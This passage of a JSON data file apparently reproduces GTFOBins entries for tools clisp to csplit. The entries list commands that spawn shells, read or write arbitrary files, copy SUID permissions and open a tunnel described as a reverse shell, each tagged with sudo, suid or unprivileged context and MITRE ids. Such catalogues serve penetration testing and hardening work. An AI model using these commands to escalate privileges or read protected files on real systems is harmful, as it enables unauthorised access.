\"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:clisp:shell:0:unprivileged","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:cmake:file-read:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:file-read:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:shell:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:shell:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmp:file-read:0:sudo","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cmp:file-read:0:suid","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cmp:file-read:0:unprivileged","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cobc:shell:0:sudo","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:cobc:shell:0:suid","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:cobc:shell:0:unprivileged","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:code:download:0:sudo","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:download:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:reverse-shell:0:sudo","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:reverse-shell:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:upload:0:sudo","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:upload:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:codex:shell:0:sudo","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/codex/"]},{"id":"gtfo:codex:shell:0:unprivileged","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/codex/"]},{"id":"gtfo:column:file-read:0:sudo","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:column:file-read:0:suid","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:column:file-read:0:unprivileged","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:comm:file-read:0:sudo","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:comm:file-read:0:suid","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:comm:file-read:0:unprivileged","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:composer:shell:0:sudo","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/composer/"]},{"id":"gtfo:composer:shell:0:unprivileged","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/composer/"]},{"id":"gtfo:cowsay:inherit:0:sudo","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowsay/"]},{"id":"gtfo:cowsay:inherit:0:unprivileged","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowsay/"]},{"id":"gtfo:cowthink:inherit:0:sudo","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowthink/"]},{"id":"gtfo:cowthink:inherit:0:unprivileged","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowthink/"]},{"id":"gtfo:cp:file-read:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-read:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-read:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:1:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:1:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cpan:inherit:0:sudo","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpan/"]},{"id":"gtfo:cpan:inherit:0:unprivileged","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpan/"]},{"id":"gtfo:cpio:file-read:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:shell:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpulimit:shell:0:sudo","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:cpulimit:shell:0:suid","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:cpulimit:shell:0:unprivileged","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:crash:command:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:command:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:suid","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crontab:command:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:command:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:inherit:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:inherit:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:csh:file-write:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:file-write:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file' -b","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:file-write:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csplit:file-read:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege 